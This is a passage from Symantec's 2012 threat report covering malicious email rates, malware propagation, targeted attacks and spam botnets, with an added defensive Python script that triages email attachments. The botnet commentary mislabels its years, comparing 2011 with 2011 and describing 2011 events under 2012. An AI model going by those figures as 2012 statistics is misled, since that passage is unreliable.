[Bar chart, 2011 vs 2012, ratio scale from 1 in 400 to 1 in 50, for: Gov/Public Sector, Education, Finance, Marketing/Media, Accom/Catering, Non-Profit, Estate Agents, Chem/Pharm, Recreation, Prof Services.]
Figure B.7. Proportion of Email Traffic Identified as Malicious by Organization Size, 2012<br />
Source: Symantec.cloud<br />
[Bar chart, 2011 vs 2012, ratio scale ("1 in N") from 1 in 450 to 1 in 135, by employee count: 1-250, 251-500, 501-1000, 1001-1500, 1501-2500, 2501+.]<br />
Figure B.8. Proportion of Email Traffic Identified as Malicious by Geographic Location, 2012<br />
Source: Symantec.cloud<br />
[Bar chart, 2011 vs 2012, ratio scale ("1 in N") from 1 in 400 to 1 in 45, for: Netherlands, Luxembourg, United Kingdom, South Africa, Germany, Australia, Bahrain, Austria, Hungary, Canada.]
Commentary<br />
• The rate of malicious attacks carried by email increased for four of the top 10 geographies being targeted and decreased for the other six; the malicious email rate fell in 2012 for organizations in Luxembourg, the United Kingdom, South Africa, Bahrain, Hungary, and Canada.<br />
• Businesses in the Netherlands were subjected to the highest rate of malicious email in 2012, with 1 in 108.0 emails blocked as malicious, compared with 1 in 266.8 in 2011.<br />
• Globally, organizations in the Government and Public sector were subjected to the highest level of malicious attacks in email traffic, with 1 in 72.2 emails blocked as malicious in 2012, compared with 1 in 41.1 for 2011.<br />
• Measured as a "1 in N" ratio (a larger N means fewer malicious emails), the rate of malicious email fell for all sizes of organization: 1 in 252.1 emails were blocked as malicious for large enterprises with more than 2,500 employees in 2012, compared with 1 in 205.1 in 2011.<br />
• 1 in 299.2 emails were blocked as malicious for SMBs with between 1 and 250 employees in 2012, compared with 1 in 267.9 in 2011.
Propagation Mechanisms<br />
Background<br />
Worms and viruses use various means to spread from one<br />
computer to another. These means are collectively referred to as<br />
propagation mechanisms. Propagation mechanisms can include<br />
a number of different vectors, such as instant messaging (IM),<br />
Simple Mail Transfer Protocol (SMTP), Common Internet File<br />
System (CIFS), peer-to-peer file transfers (P2P), and remotely<br />
exploitable vulnerabilities. 3 Some malicious code may even use<br />
other malicious code as a propagation vector by locating<br />
a computer that has been compromised through a backdoor<br />
server and using it to upload and install itself.<br />
Methodology<br />
This metric assesses the prominence of propagation<br />
mechanisms used by malicious code. To determine this,<br />
Symantec analyzes the malicious code samples that propagate<br />
and ranks associated propagation mechanisms according to<br />
the related volumes of potential infections observed during the<br />
reporting period. 4
Data<br />
Figure B.9. Propagation Mechanisms<br />
Source: Symantec<br />
Rank and mechanism, with the share of malicious code using it in 2012, the change in percentage points, and the 2011 share:<br />
1. Executable file sharing (71%; -5; 76% in 2011). The malicious code creates copies of itself or infects executable files. The files are distributed to other users, often by copying them to removable drives such as USB thumb drives and setting up an autorun routine.<br />
2. File transfer, CIFS (33%; -10; 43% in 2011). CIFS is a file sharing protocol that allows files and other resources on a computer to be shared with other computers across the Internet. One or more directories on a computer can be shared to allow other computers to access the files within. Malicious code creates copies of itself on shared directories to affect other users who have access to the share.<br />
3. Remotely exploitable vulnerability (26%; -2; 28% in 2011). The malicious code exploits a vulnerability that allows it to copy itself to or infect another computer.<br />
4. File transfer, email attachment (8%; -6; 14% in 2011). The malicious code sends spam email that contains a copy of the malicious code. Should a recipient of the spam open the attachment, the malicious code will run and their computer may be compromised.<br />
5. File transfer, P2P (4%; -3; 7% in 2011). The malicious code copies itself to folders on an infected computer that are associated with P2P file sharing applications. When the application runs, the malicious file will be shared with other users on the same P2P network.<br />
6. File transfer, non-executable file sharing (3%; +1; 2% in 2011). The malicious code infects non-executable files.<br />
7. File transfer, HTTP, embedded URL, instant messenger (3%; +2; 1% in 2011). The malicious code sends or modifies instant messages with an embedded URI that, when clicked by the recipient, will launch an attack and install a copy of the malicious code.<br />
8. SQL (1%; 0; 1% in 2011). The malicious code accesses SQL servers, by exploiting a latent SQL vulnerability or by trying default or guessable administrator passwords, and copies itself to the server.<br />
9. File transfer, instant messenger (1%; -4; 5% in 2011). The malicious code sends or modifies instant messages that contain a copy of the malicious code. Should a recipient open the attachment, the malicious code will run and their computer may be compromised.<br />
10. File transfer, HTTP, embedded URI, email message body (figures for this row are not shown). The malicious code sends spam email containing a malicious URI that, when clicked by the recipient, will launch an attack and install a copy of the malicious code.<br />
Commentary<br />
As malicious code continues to become more sophisticated,<br />
many threats employ multiple mechanisms.<br />
• Executable file sharing activity decreases: In 2012, 71<br />
percent of malicious code propagated as executables,<br />
a decrease from 76 percent in 2011. This propagation<br />
mechanism is typically employed by viruses and some<br />
worms to infect files on removable media. For example,<br />
variants of Ramnit and Sality use this mechanism, and both<br />
families of malware were significant contributing factors in<br />
this metric, as they were ranked as the two most common<br />
potential infections blocked in 2012.<br />
• Remotely exploitable vulnerabilities decrease: The<br />
percentage of malicious code that propagated through<br />
remotely exploitable vulnerabilities in 2012 at 26 percent<br />
was 2 percentage points lower than in 2011. Examples of<br />
attacks employing this mechanism also include Downadup,<br />
which gains a bit of momentum and is still a major<br />
contributing factor to the threat landscape, ranked third<br />
position in 2012.<br />
• File transfer using CIFS is in decline: The percentage of<br />
malicious code that propagated through CIFS file transfer<br />
fell by 10 percentage points between 2011 and 2012, a<br />
deeper decline than the one seen in 2011. Fewer attacks<br />
exploited CIFS as an infection vector in 2012.<br />
• File transfer via email attachments continues to decline: It<br />
is worth noting the continued decline in the percentage of<br />
malicious code that propagated through email attachments<br />
for the fifth year running. Between 2011 and 2012, the<br />
proportion of malware using this mechanism fell by six<br />
percentage points.<br />
• While this propagation mechanism is still effective, it was<br />
expected that this downward trend would continue; however,<br />
the shift towards using malicious URLs that was observed<br />
in 2011 did not continue as expected into 2012.
Industrial Espionage: Targeted Attacks and Advanced Persistent Threats (APTs)<br />
Background<br />
With targeted attacks and advanced persistent threats being<br />
very much in the news in 2012, in this section we review<br />
targeted attacks and look more closely at what has been<br />
described as “advanced persistent threats” or APTs. Terms such<br />
as APT have been overused and sometimes misused, but APTs<br />
are a real threat to some companies and industries.<br />
As noted earlier in this section, overall in 2012, 1 in 281.8<br />
emails were identified as malicious, but approximately 0.2<br />
percent of those were highly targeted. This means that highly<br />
targeted attacks, which may be the precursor to an APT, account<br />
for approximately one in every two million emails, still a rare<br />
incident rate. However, targeted malware in general has grown<br />
in volume and complexity in recent years, but as it is designed<br />
to steal company secrets, it can be very difficult for recipients<br />
to recognize, especially when the attacker employs compelling<br />
social engineering techniques, as we highlight in this report.<br />
Targeted attacks have been around for a number of years now,<br />
and when they first surfaced back in 2005, Symantec.cloud<br />
identified and blocked approximately one attack each week.<br />
Over the course of the following year, this number rose to one<br />
or two per day, and over the following years it rose still further.<br />
The global average number of attacks per day in 2012 was<br />
116, compared with 82 in 2011 and 77 in 2010. We witnessed<br />
one large attack in April (see Figure B.10). Events like this are<br />
extremely rare, and this particular attack resulted in a large<br />
jump for that month. Without adjusting for this, the global<br />
average would be nearer to 143 per day with this company<br />
included.<br />
A highly targeted attack is typically the precursor to an APT,<br />
and the typical profile of a highly targeted attack will commonly<br />
exploit a maliciously crafted document or executable, which is<br />
emailed to a specific individual, or small group of individuals.<br />
These emails will be dressed up with a social engineering<br />
element to make it more interesting and relevant.<br />
The term “APT” has evolved to describe a unique category<br />
of targeted attacks that are specifically designed to target a<br />
particular individual or organization. APTs are designed to stay<br />
below the radar, and remain undetected for as long as possible,<br />
a characteristic that makes them especially effective, moving<br />
quietly and slowly in order to evade detection. Unlike the fast-money<br />
schemes typical of more common targeted attacks, APTs<br />
may have international espionage and/or sabotage objectives.<br />
The objective of an APT may include military, political or<br />
economic intelligence gathering, confidential or trade secret<br />
theft, disruption of operations, or even the destruction of<br />
equipment.<br />
Another characteristic of an APT is that it will be part of a<br />
longer-term campaign and not follow the opportunistic “smash-and-grab”<br />
approach typical of most malware in circulation today.<br />
Its purpose will be to remain undetected for as long as possible,<br />
perhaps using a variety of attacks over that period. If one attack<br />
fails, then a different approach—one more likely to succeed—will<br />
be taken in the weeks to come. If successful, an attacker can<br />
use the compromised systems as a beachhead for subsequent<br />
attacks.<br />
All of this illustrates how these attacks can be both advanced<br />
and persistent threats. They are advanced because of the<br />
methods employed to avoid detection, such as the use of<br />
zero-day exploits, and the means used to communicate with<br />
the command and control network; command and control<br />
instructions often involve encrypted traffic, typically sent in<br />
small bursts and disguised as normal network traffic. To<br />
exfiltrate stolen information without detection, the attacker<br />
must avoid easily detectable encryption and use common<br />
protocol channels that would not look out of place, while<br />
keeping the data hidden.<br />
Furthermore, they can be described as persistent because<br />
the aim is to maintain a foothold within the compromised<br />
company’s infrastructure, and in order to achieve this, the<br />
attacker will use numerous methods. The attackers have a very<br />
clear and specific objective; they are well-funded and well-organized,<br />
and without the right protection in place, these<br />
threats have both the capability and the intent to achieve their<br />
desired goals.<br />
Methodology<br />
Defining what is meant by targeted attacks and APT is<br />
important in order to better understand the nature of this<br />
mounting threat and to make sure that you have invested in the<br />
right kinds of defenses for your organization.<br />
The types of organizations being targeted are often thought to<br />
be large, well-known multi-national organizations, often within<br />
particular industries, including the public sector, defense,<br />
energy, and pharmaceutical. In more recent years the scope has<br />
widened to include almost any organization, including SMBs.<br />
But what do we really mean by targeted attacks and advanced<br />
persistent threats?<br />
An attack can be considered as targeted if it is intended for<br />
a specific person or organization, typically created to evade<br />
traditional <strong>security</strong> defenses and frequently using advanced
social engineering techniques. However, not all targeted attacks<br />
lead to an APT; for example, the Zeus banking Trojan can be<br />
targeted and will use social engineering in order to trick the<br />
recipient into activating the malware. But Zeus is not an APT.<br />
The attacker doesn’t necessarily care about who the individual<br />
recipient is; they may have been selected simply because the<br />
attacker is able to exploit information gathered about that<br />
individual, typically harvested through social networking<br />
websites.<br />
Social engineering has always been at the forefront of many of<br />
these more sophisticated types of attack. Without strong social<br />
engineering, or “head-hacking,” even the most technically<br />
sophisticated attacks are unlikely to succeed. Many socially<br />
engineered attacks are based on information harvested through<br />
social networking and social media websites. Once the attackers<br />
are able to understand their targets’ interests, hobbies, with<br />
whom they socialize, and who else may be in their networks,<br />
they are often able to construct more believable and convincing<br />
attacks.<br />
The data in this section is based on analysis of targeted email<br />
malware identified and blocked by Symantec.cloud on behalf of<br />
its customers in 2012.<br />
Figure B.10. Average Number of Targeted Email Attacks Per Day, 2012<br />
Source: Symantec.cloud<br />
[Line chart of targeted email attacks per day, January to December 2012, on a 0 to 250 scale.]<br />
Data and Commentary<br />
Malware such as Stuxnet in 2010, Duqu in 2011, and Flamer<br />
and Disttrack in 2012 show increasing levels of sophistication<br />
and danger. For example, the Disttrack malware used in the<br />
Shamoon attacks on a Saudi oil firm had the ability to wipe hard<br />
drives.[5]<br />
The same techniques used by cybercriminals for industrial<br />
espionage may also be used by states and state proxies for cyber<br />
attacks and political espionage. Sophisticated attacks may<br />
be reverse-engineered and copied so that the same or similar<br />
techniques can be used in less discriminate attacks. A further<br />
risk is that malware developed for cybersabotage may spread<br />
beyond its intended target and infect other computers in a kind<br />
of collateral damage.<br />
Targeted attacks have become an established part of the threat<br />
landscape and safeguarding against them has become one of<br />
the main concerns of CISOs and IT managers. Targeted attacks<br />
are commonly used for the purposes of industrial espionage to<br />
gain access to the confidential information on a compromised<br />
computer system or network. They are fewer but potentially the<br />
most difficult attacks to defend against. It is difficult to attribute<br />
an attack to a specific group or a government without sufficient<br />
evidence. The motivation and the resources of the attacker<br />
sometimes hint to the possibility that the attacker could be<br />
state sponsored, but finding clear evidence is difficult. Attacks<br />
that could be state sponsored appear to be rare in comparison<br />
with regular cybercrime, though they have often gained<br />
more notoriety. They can be among the most sophisticated<br />
and damaging of these types of threats. Governments are<br />
undoubtedly devoting more resources to defensive and offensive<br />
cyberwarfare capabilities. In 2012, it was still unlikely that most<br />
businesses would encounter such an attack, and the greatest risk<br />
comes from the more prevalent targeted attacks that are created<br />
for the purposes of industrial espionage. Increasingly, SMBs are<br />
finding themselves on the frontline of these attacks as they have<br />
fewer resources to combat the threat and a successful attack here<br />
may subsequently be used as the springboard to further attacks<br />
against a larger organization to which they may be a supplier.<br />
To understand the nature of targeted attacks, Symantec collected<br />
data on over 55,000 attacks that could clearly be identified<br />
as targeted. These attacks were email-based and contained a<br />
malicious payload.<br />
We saw a 41.5 percent increase in targeted attacks with more<br />
attacks aimed at companies with fewer than 250 staff members.<br />
One possible explanation is that attackers have accelerated their<br />
use of small companies as a way to infiltrate larger organizations<br />
further up the supply chain. Attackers started using watering<br />
hole attacks, a technique where malware on infected third-party<br />
websites is used to target employees of companies who might<br />
visit those websites.<br />
The total number of attacks aimed at organizations with fewer<br />
than 2,500 employees is roughly equal to attacks aimed at<br />
organizations with greater than 2,500 employees.<br />
R&D, sales, C-level, and senior employees were the most targeted,<br />
in that order.<br />
Attackers want to capture the knowledge workers who have<br />
access to intellectual property (IP), but they don’t have to attack<br />
them directly to get the information they want.<br />
Too often organizations think that if they are not the target of a<br />
high profile attack, or if one attack has been blocked, that their<br />
troubles are over. However, our research shows that a targeted<br />
attack can go on for months. The attack will change over time,<br />
with new social engineering, new malware, and often leveraging<br />
multiple zero-day vulnerabilities. What our research does not<br />
show is attackers giving up after one attempt to breach an<br />
organization.<br />
The Characteristics of a Targeted Attack<br />
When comparing the number of targeted attacks directed at<br />
companies with 2,500 or more employees and companies with<br />
fewer than 2,500, we see an equal split.<br />
Thirty-five percent of all targeted attacks are targeted at<br />
companies with fewer than 500 employees, as illustrated in<br />
figure B.11. And despite the commonly held belief of small<br />
businesses that they would never be the victims of a targeted<br />
attack, 30.8 percent of all targeted attacks are directed at<br />
companies with up to 250 employees.
Figure B.11. Targeted Attacks by Company Size, 2012<br />
Source: Symantec.cloud<br />
1-250 31%<br />
251-500 5%<br />
501-1,000 3%<br />
1,001-1,500 2%<br />
1,501-2,500 9%<br />
2,501+ 50%<br />
Figure B.12. Targeted Attacks Against Job Function, 2012<br />
Source: Symantec.cloud<br />
[Bar chart of the percentage change from 2011 to 2012, on a -15% to 30% scale, for: Chief Exec. or Board Level; PR and Marketing; Personal Assistant; Research and Development; Human Resources; Sales; Senior Management; Shared Mailbox (info@, sales@, etc.).]
While 55 percent of the mailboxes targeted for attack are<br />
high-level executives, senior managers and people in R&D, the<br />
majority of targets are people who are unlikely to have such<br />
information. Why then are they targeted?<br />
As we’ve said, they provide a stepping stone to the ultimate<br />
target. And in the case of personal assistants, sales and media<br />
(public relations), they work closely with people who are the<br />
ultimate target. But just as important, these people are also easy<br />
to find and research online: email addresses for public relations<br />
people, shared mailboxes, and recruiters are commonly found on<br />
a company’s website.<br />
Additionally, these people are used to being contacted by people<br />
they do not know. And in many cases part of the job requires<br />
them to open unsolicited files from strangers. Think of how<br />
many resumes a recruiter receives each day in a document or<br />
PDF file attachment. Finally, under the illusion that targeted<br />
attacks are only aimed at high-level executives or those working<br />
with the company’s intellectual property (IP), they are less<br />
likely to have their guard up against social engineering.<br />
In Figure B.13, we can see that malicious EXEs are the most<br />
used file type in targeted attacks (over one-third of attacks).<br />
However, malicious DOCs and PDFs are also commonly used by<br />
attackers (together 44.4 percent of the attacks).<br />
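As an added example (not code from the report), the following Python script triages the attachments of a raw email against the file types Figure B.13 shows being attached to targeted attacks: it blocks directly executable types, blocks a PE executable whose name claims a document format, and routes document types that the figure shows carrying attacks to review rather than straight to the user. The message and its attachments are constructed samples.

```python
"""Added example (not code from the Symantec report): triage email
attachments against the file types Figure B.13 shows being attached to
targeted attacks. The message built below is a constructed sample."""
import email
from email import policy
from email.message import EmailMessage
from typing import Optional

# Share of targeted attacks using each attachment type in 2012 (Figure B.13).
TARGETED_ATTACK_TYPES = {
    "exe": 39, "doc": 34, "pdf": 11, "xls": 5, "scr": 2,
    "bin": 2, "lnk": 2, "chm": 2, "dmp": 1, "dll": 1,
}
# Types that run code as soon as they are opened: block rather than review.
DIRECTLY_EXECUTABLE = {"exe", "scr", "dll", "lnk", "chm", "bin"}
# Magic-byte prefixes for the formats recognised here.
MAGIC = {
    b"MZ": "exe",                                   # Windows PE (.exe/.scr/.dll)
    b"%PDF": "pdf",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole",      # legacy .doc/.xls container
}


def sniff_type(data: bytes) -> Optional[str]:
    """Identify the content from its leading bytes, ignoring the filename."""
    for prefix, kind in MAGIC.items():
        if data.startswith(prefix):
            return kind
    return None


def extension(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def content_mismatch(ext: str, sniffed: Optional[str]) -> bool:
    """True when the magic bytes contradict the declared extension."""
    if sniffed is None:
        return False                      # unknown format: nothing to compare
    if sniffed == "exe":
        return ext not in {"exe", "scr", "dll"}
    if sniffed == "ole":
        return ext not in {"doc", "xls"}
    return sniffed != ext                 # pdf


def triage_attachment(filename: str, data: bytes) -> dict:
    """Verdict for one attachment: 'block', 'review' or 'allow', with reasons."""
    ext, sniffed = extension(filename), sniff_type(data)
    reasons = []
    # A PE header under a document name is the strongest signal checked here.
    if sniffed == "exe" and content_mismatch(ext, sniffed):
        reasons.append(f"PE executable (MZ header) disguised as .{ext}")
    if ext in DIRECTLY_EXECUTABLE:
        reasons.append(f"directly executable attachment type .{ext}")
    if reasons:
        return {"name": filename, "verdict": "block", "reasons": reasons}
    if content_mismatch(ext, sniffed):
        reasons.append(f"content looks like {sniffed} but the name says .{ext}")
    if ext in TARGETED_ATTACK_TYPES:
        # Ordinary business documents, yet half of targeted-attack payloads:
        # send them to sandbox detonation or content inspection first.
        reasons.append(f".{ext} carried {TARGETED_ATTACK_TYPES[ext]}% of "
                       "targeted attacks in 2012")
    return {"name": filename, "verdict": "review" if reasons else "allow",
            "reasons": reasons}


def triage_message(raw: bytes) -> list:
    """Parse a raw RFC 822 message and triage every attachment in it."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        results.append(triage_attachment(name, data))
    return results


def build_sample_message() -> bytes:
    """Constructed sample: a job application, the kind of unsolicited mail
    the report says recruiters must open, carrying four attachments."""
    msg = EmailMessage()
    msg["From"] = "candidate@example.net"
    msg["To"] = "jobs@example.com"
    msg["Subject"] = "Application for the R&D position"
    msg.set_content("Please find my documents attached.")
    pe_stub = b"MZ\x90\x00" + b"\x00" * 60        # constructed PE header only
    msg.add_attachment(b"%PDF-1.4\n%constructed sample\n",
                       maintype="application", subtype="pdf", filename="cv.pdf")
    msg.add_attachment(pe_stub, maintype="application", subtype="pdf",
                       filename="portfolio.pdf")             # executable renamed
    msg.add_attachment(pe_stub, maintype="application",
                       subtype="octet-stream", filename="photo.scr")
    msg.add_attachment("Monday 10:00, room 4\n", filename="agenda.txt")
    return bytes(msg)


if __name__ == "__main__":
    for result in triage_message(build_sample_message()):
        print(result["verdict"].upper(), result["name"],
              "; ".join(result["reasons"]))
```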
Looking at the break out of targeted attacks by industry,<br />
Manufacturing was the most-targeted sector in 2012, with 24.3<br />
percent of targeted attacks destined for this sector, compared<br />
with 15 percent in 2011. Attacks against government and public<br />
sector organizations fell from 25 percent in 2011, when it was<br />
the most targeted sector, to 12 percent in 2012. It’s likely that<br />
frontline attacks are moving down the supply chain, particularly<br />
towards SMBs.<br />
Figure B.13. Breakdown of Document Types Being Attached to Targeted Attacks, 2012<br />
Source: Symantec.cloud<br />
EXE 39%<br />
DOC 34%<br />
PDF 11%<br />
XLS 5%<br />
SCR 2%<br />
BIN 2%<br />
LNK 2%<br />
CHM 2%<br />
DMP 1%<br />
DLL 1%<br />
Conclusion<br />
Targeted attacks should be a concern for all organizations, large<br />
and small. While C-level executives and those that work with<br />
a company’s IP should be careful, everyone in an organization<br />
is at risk of being targeted. This is especially true of workers<br />
who in the course of their jobs typically receive email from<br />
people they don’t know. In the end, no matter the size or type<br />
of organization you have or your role in that organization, you<br />
are at risk and best practices must be followed to protect the<br />
organization. Don’t become the weakest link in the supply chain.
Figure B.14. Analysis of Targeted Attacks by Top 10 Industry Sectors, 2012<br />
Source: Symantec.cloud<br />
Manufacturing 24%<br />
Finance, Insurance and Real Estate 19%<br />
Services - Non-Traditional 17%<br />
Government 12%<br />
Energy/Utilities 10%<br />
Services - Professional 8%<br />
Aerospace 2%<br />
Retail 2%<br />
Wholesale 2%<br />
Transportation, Communications, Electric, Gas, and Sanitary 1%
Malicious Code Trends Endnotes<br />
01 See http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionTracking#toc15.<br />
02 See http://www.symantec.com/<strong>security</strong>_response/writeup.jsp?docid=2010-071400-3123-99.<br />
03 CIFS is a file sharing protocol that allows files and other resources on a computer to be shared with other computers across the<br />
Internet. One or more directories on a computer can be shared to allow other computers to access the files within.<br />
04 Because malicious code samples often use more than one mechanism to propagate, cumulative percentages may exceed 100<br />
percent.<br />
05 See http://www.symantec.com/connect/blogs/shamoon-attacks.
APPENDIX :: C<br />
SPAM AND FRAUD ACTIVITY TRENDS
Spam and Fraud Activity Trends<br />
Phishing is an attempt by a third party to solicit confidential information from an individual,<br />
group, or organization by mimicking (or spoofing) a specific, usually well-known brand.<br />
Phishers attempt to trick users into disclosing personal data, such as credit card numbers,<br />
online banking credentials, and other sensitive information, which they can then use to<br />
commit fraudulent acts. Phishing generally requires victims to provide their credentials,<br />
often by duping them into filling out an online form. This is one of the characteristics that<br />
distinguish phishing from spam-based scams (such as the widely disseminated “419 scam”[1]<br />
and other social engineering scams).<br />
Spam is usually defined as junk or unsolicited email sent by a third party. While it is certainly<br />
an annoyance to users and administrators, spam is also a serious <strong>security</strong> concern because<br />
it can be used to deliver Trojans, viruses, and phishing attacks. Spam can also include URLs<br />
that link to malicious sites that, without the user being aware of it, attack a user’s system<br />
upon visitation. Large volumes of spam could also cause a loss of service or degradation in<br />
the performance of network resources and email services.<br />
This section covers phishing and spam trends. It also discusses activities observed on underground economy servers because that is<br />
where much of the profit is made from phishing and spam attacks.<br />
• Analysis of Spam Activity Trends<br />
• Analysis of Spam Activity by Geography, Industry Sector, and Company Size<br />
• Analysis of Spam Delivered by Botnets<br />
• Significant Spam Tactics<br />
• Spam by Category<br />
• Phishing Activity Trends<br />
• Analysis of Phishing Activity by Geography, Industry Sector, and Company Size
Analysis of Spam Activity Trends<br />
Background<br />
This section discusses the patterns and trends relating to spam<br />
message volumes and the proportion of email traffic identified<br />
as spam during 2012.<br />
Methodology<br />
The analysis for this section is based on global spam and overall<br />
email volumes for 2012. Global values are determined based on<br />
the statistically representative sample provided by Symantec’s<br />
Brightmail[2] operations and spam rates include spam blocked by<br />
Symantec.cloud.<br />
Data and Commentary<br />
Figure C.1. Global Spam Volume in Circulation, 2012<br />
Source: Symantec<br />
[Line chart of daily spam volume in billions, 0 to 60, January to December 2012. Annotations: the Grum botnet takedown reduced spam activity on July 15-17; a spam dip was seen due to a quiet Festi botnet in October, which had been active in early September.]<br />
There were approximately 30 billion spam emails in circulation worldwide each day overall in 2012, compared with 42.1 billion in 2011; a decrease of 28.6 percent in global spam volume.
Figure C.2. Proportion of Email Traffic Identified as Spam, 2011–2012<br />
Source: Symantec.cloud<br />
[Line chart of the monthly spam rate, 10 to 90 percent, January to December, 2011 versus 2012.]<br />
Overall for 2012, 68.5 percent of email traffic was identified as spam, compared with 75.1 percent in 2011; a decrease of 6.6 percentage points.
Analysis of Spam Activity by Geography, Industry Sector, and Company Size<br />
Background<br />
Spam activity trends can also reveal patterns that may be<br />
associated with particular geographical locations or hotspots.<br />
This may be a consequence of social and political changes in the<br />
region, such as increased broadband penetration and increased<br />
competition in the marketplace that can drive down prices,<br />
increasing adoption rates. Of course, there may also be other<br />
factors at work based on the local economic conditions that may<br />
present different risk factors. Similarly, the industry sector may<br />
also have an influence on an organization’s risk factor, where<br />
certain industries may be exposed to different levels of threat<br />
based on the nature of their business.<br />
Moreover, the size of an organization can also play a part in<br />
determining their exposure to risk. SMBs may find themselves<br />
the target of a spam attack because they are perceived to be<br />
softer targets, being less likely to have the same levels of<br />
<strong>security</strong> countermeasures as larger organizations, which are<br />
more likely to have greater budgetary expenditure applied to<br />
their anti-spam and <strong>security</strong> countermeasures.<br />
Methodology<br />
Analysis of spam activity based on geography, industry, and<br />
size is determined from the patterns of spam activity for<br />
Symantec.cloud clients for threats during 2012.<br />
Data<br />
Figure C.3. Proportion of Email Traffic Identified as Spam by Industry Sector, 2012<br />
Source: Symantec.cloud<br />
[Bar chart comparing 2011 and 2012 spam rates, 0 to 90 percent, for: Marketing/Media; Manufacturing; Recreation; Agriculture; Chem/Pharm; Building/Cons; Telecoms; IT Services; Wholesale; Professional Services.]
Figure C.4. Proportion of Email Traffic Identified as Spam by Organization Size, 2012<br />
Source: Symantec.cloud<br />
[Bar chart comparing 2011 and 2012 spam rates, 0 to 90 percent, by organization size: 1-250; 251-500; 501-1,000; 1,001-1,500; 1,501-2,500; 2,501+.]<br />
Figure C.5. Proportion of Email Traffic Identified as Spam by Geographic Location, 2012<br />
Source: Symantec.cloud<br />
[Bar chart comparing 2011 and 2012 spam rates, 10 to 90 percent, for: Saudi Arabia; Bulgaria; Chile; Hungary; China; Sri Lanka; Tanzania, United Republic of; Qatar; Brazil; Oman.]
Commentary<br />
• The spam rate has decreased across all top 10 geographies<br />
in 2012. The highest rate for spam is for organizations in<br />
Saudi Arabia, with an overall average spam rate of 79.1<br />
percent. In 2011, the highest rate was in Saudi Arabia, with<br />
an overall average spam rate of 80.9 percent.<br />
• The spam rate has decreased across all top 10 industry<br />
sectors in 2012. Organizations in the Marketing/Media<br />
sector were subjected to the highest spam rate of 69.3<br />
percent in 2012; in 2011, the automotive sector had the<br />
highest spam rate of 77.9 percent.<br />
• The spam rate has decreased for all sizes of organization in<br />
2012. 68.4 percent of emails sent to large enterprises with<br />
more than 2,500 employees in 2012 were identified as spam,<br />
compared with 75.2 percent in 2011.<br />
• 68.4 percent of emails sent to SMBs with up to 250<br />
employees in 2012 were identified as spam, compared with<br />
74.6 percent in 2011.
Analysis of Spam Delivered by Botnets<br />
Background<br />
This section discusses botnets and their use in the sending of<br />
spam. Just as ballistics analysis in the physical world can reveal the<br />
gun used to fire a bullet, botnets can similarly be identified<br />
by common features within the structure of email headers<br />
and corresponding patterns during the SMTP transactions.[3]<br />
Spam emails are classified for further analysis according to the<br />
originating botnet during the SMTP transaction phase. This<br />
analysis only reviews botnets involved in sending spam and does<br />
not look at botnets used for other purposes, such as for financial<br />
fraud or DDoS attacks.<br />
Methodology<br />
Symantec.cloud spam honeypots collected between 5 and 10<br />
million spam emails each day during 2011. These are classified<br />
according to a series of heuristic rules applied to the SMTP<br />
conversation and the email header information.<br />
A variety of internal and external IP reputation lists are also<br />
used in order to classify known botnet traffic based on the<br />
source IP address of the sending machine. Information is shared<br />
with other <strong>security</strong> experts to ensure data is up to date and<br />
accurate.<br />
Data<br />
Figure C.6. Percentage of Spam Sent from Botnets in 2012<br />
Source: Symantec.cloud<br />
[Line chart of the monthly percentage of spam sent from botnets, 0 to 90 percent, January to December 2012, with a trend line.]
Figure c.7. Analysis of Spam-sending Botnet Activity, 2012<br />
Source: Symantec.cloud<br />
Botnet Name % of Botnet Spam Est. Spam Per Day Top Sources of Spam from Botnet<br />
Lethic 43.4% 9,632,000,000 India (14%) Vietnam (6%) Poland (5%)<br />
Cutwail 21.8% 4,838,000,000 India (15%) Russia (6%) Brazil (6%)<br />
Grum 16.2% 3,585,000,000 India (18%) Vietnam (13%) Pakistan (10%)<br />
Festi 15.0% 3,331,000,000 Saudi Arabia (39%) India (24%) Turkey (12%)<br />
Maazben 1.3% 277,000,000 Brazil (12%) India (10%) United States (8%)<br />
Gheg 0.7% 149,000,000 Indonesia (14%) India (12%) Vietnam (9%)<br />
Kelihos 0.6% 140,000,000 India (20%) Peru (14%) Turkey (12%)<br />
Xarvester 0.4% 90,000,000 UK (13%) Italy (8%) India (7%)<br />
Waledac 0.2% 52,000,000 India (10%) Kazakhstan (5%) Brazil (5%)<br />
Bagle 0.2% 48,000,000 United States (20%) China (18%) Brazil (10%)<br />
Commentary<br />
• In 2011, approximately 78.8 percent of all spam was<br />
distributed by spam-sending botnets, compared with 88.2<br />
percent in 2011, a decrease of 9.4 percentage points. This<br />
was in large part owing to the disruption of the Rustock<br />
botnet on 16 March 2011. By the end of 2011, this number<br />
rose to 81.2 percent.<br />
• In the 7 days prior to the disruption of the Rustock botnet,<br />
each day approximately 51.2 billion spam emails were in<br />
circulation worldwide. In the 7 days following, this number<br />
fell to 31.7 billion, a decrease of 38.0 percent in global spam<br />
volume.<br />
• The global spam rate during the 7 days before the<br />
Rustock botnet ceased spamming was 78.2 percent,<br />
compared with 70.0 percent in the 7 days after.<br />
• During the second half of 2011, the change in the frequency<br />
with which spam was distributed from botnets became much<br />
more noticeable, as shown in figure C.6. Large spam runs<br />
often lasted for only two or three days and when the spam<br />
run ceased, the volume of botnet-spam fell considerably;<br />
however, when Rustock was in operation during 2010 and<br />
during the first quarter of 2011, it was almost continually<br />
sending spam at a fairly regular and steady rate.
Significant Spam Tactics<br />
Background<br />
This section discusses significant spam tactics used throughout<br />
2012, including the size of spam messages and the languages<br />
used in spam emails.<br />
Size of Spam Messages<br />
Figure C.8. Frequency of Spam Messages by Size, 2012<br />
Source: Symantec<br />
[Bar chart of spam messages by size bucket, 0 to 60 percent, with buckets running up to 100 KB; the largest bar, messages under 5 KB, is 49 percent.]<br />
• In 2012, 49 percent of spam<br />
messages were less than 5<br />
KB in size. For spammers,<br />
smaller file sizes mean more<br />
messages can be sent using<br />
the same resources.<br />
• Increased sizes are often<br />
associated with malicious<br />
activity, where email<br />
attachments contain<br />
malicious executable code.
Proportion of Spam Messages Containing URLs<br />
Figure c.9. Proportion of Spam Messages Containing URLs, 2012<br />
Source: Symantec<br />
